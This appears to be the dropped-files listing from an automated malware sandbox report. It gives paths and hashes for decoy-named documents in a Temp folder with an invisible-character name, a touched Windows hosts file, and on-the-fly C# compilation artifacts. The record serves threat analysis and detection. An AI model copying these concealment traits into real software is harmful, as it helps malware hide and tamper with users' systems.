C:\Users\Admin\AppData\Local\Temp\   ‎ \Common Files\Documents\BackupConvertFrom.xltx

Filesize
848KB

MD5
c25c6622008a31c6f478a7d46290dc2d

SHA1
08cc62432b29c855859cbe3b934df2e86a272877

SHA256
baf799151e86378276c513cef55083eeb5966cca825ef41cd85575538b001c1a

SHA512
96700a8d7a0d5aefd0c9f1bc8445eccd0f70517eb924c8886030b6adcdeab8117c5aea4330d42eb869876ebb933def56566b9b0aca9c9699ae7c8b34ca19f599

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎ \Common Files\Documents\CheckpointSend.xls

Filesize
700KB

MD5
c1618f0343f4490aaa5030be8637f398

SHA1
f1954ea42ad684bc9a856b463bc88645ee2352da

SHA256
54f001d5c84a4a28611b9a72a49cae056c3eb5637650e32dda26600ce3079074

SHA512
72a2255d7c820d9694629ca2fb24c44da4710459e217d1bb2bbce5a9bce65226dbfe3d465b25958389ffb3a241be091c147276fdb99d2c1a2651f07e80d3d1ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎ \Common Files\Documents\DenyWait.docx

Filesize
737KB

MD5
cebc88f8a0635731d267ee36f4fdf6e4

SHA1
5ba3a4b80bdbff572b76a966d16aba83228c73d8

SHA256
cffa5b70ef1fef4fe22f9f7b29dc7bbf31927216f7eaea9866764ce0ea872de3

SHA512
c118e54c94cc642729857bbe6b09a99dcc0aeec793ec2f2651b923c490a8d3041aa4f523a0961328841700808c3a92ff3ec1258499f3115be157f080025b0b50

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎ \Common Files\Documents\FindUnprotect.docx

Filesize
13KB

MD5
40f9f3734ed6ee466d54dbc973e2de72

SHA1
b9fab8a7439dc582f765350df435af67d129e7c8

SHA256
326d9003c91d866e4c1f6072282a60494ecbfef224d87356a21da707e0c6af96

SHA512
09e7db3edf85cc8d6368013f24cc7cf6ff108da7b9e8e7169c13955865de226d02537b64e525bb13a053ea40e6a848ad1b6835afd7f71c1fe48c9fdb091a2f8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎ \Common Files\Documents\LimitDeny.docx

Filesize
460KB

MD5
bf26904f824afbef29063db0ce21341f

SHA1
78a0ae02bbe81f82c2066686ac8e1440390dc87f

SHA256
ef2e88dbe59cd31d3105c746d8e0d5eb67afcb888b541cd607b919a911c7702d

SHA512
73e5d1f4e912cf9131d8c9af97e68ec12dd12174c33df8c0970b84cee513725056d8697be2ba7674b87b326369142d87cc321dcc06ca8693c0852f14b5def1f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎ \Common Files\Documents\OptimizeGroup.csv

Filesize
774KB

MD5
5490e70b6d82567d6cab76c8b463b34d

SHA1
8fc5210d4720eeb151b76acb168abba53abf56be

SHA256
462a0988bff42d1815e619256da6693c2291ccec9e190059ff413bd34e8ff088

SHA512
1a192882248b42e13ee13ee3542a905978cbf2b6c936a1982765f16a024eff49a5b16fb745d45744b1b873202311ee1db3c63ba63df65b22baf6ce1e18ab706b

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎ \Common Files\Documents\StepSelect.xlsx

Filesize
9KB

MD5
aa27fff397f0937a591bc241a7800111

SHA1
67c4ed651119fd9782fd55e8df26b22313044acb

SHA256
6be353e150ff2675761fe4a49f9a15e4ac7106f3a9bb9e78c926cc9a56b76e6e

SHA512
8ebba314582d669cd111b34fc1800f2a50acace8db59e0b9f084c6889fa49cf5e9fa2fd2d6426cbc2beaab3fb9419e892344e94d7706f14562cd6ea59558375e

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3daymuqz\3daymuqz.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3daymuqz\3daymuqz.cmdline

Filesize
607B

MD5
63fa3439c1d053dd7bfd9f686280004f

SHA1
50f2c090833b9a48508c826da335d251ca32269f

SHA256
b96022488ec5c96528ca56a9662d832ff6267146428898d888632f801a9377e3

SHA512
f7ddb7a086e27e201d55fa48bc21db1c60d45935324a28523d1387b6b1cd95730e420777da7ad198afb9a113e3bd46ea8fc01f6ab75a454416b0c34f4ed79634

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3daymuqz\CSC40AF48DE648648C38739CBB191C28D44.TMP

Filesize
652B

MD5
04815e6d87aa824dc38abe95fd76f0f0

SHA1
ba58f8b8c4b7e4ed5578af9758fbb3bc6e695b97

SHA256
9ff848e482a4db939be950b9995a191592548f08ffebf02632eb4f1c9dcede00

SHA512
7f70d8ab520d9f5d9e89be1abeaee8a88e73703cb81beadecea25f0e6658e000ce255ae9571178e21359446a8dd05f4b4fa0014fc155dd68f74b021aa69842ad

Download Submit
memory/4052-69-0x00000272F8820000-0x00000272F8842000-memory.dmp

Filesize
136KB

Download
memory/4400-190-0x00000270CE5B0000-0x00000270CE5B8000-memory.dmp

Filesize
32KB

Download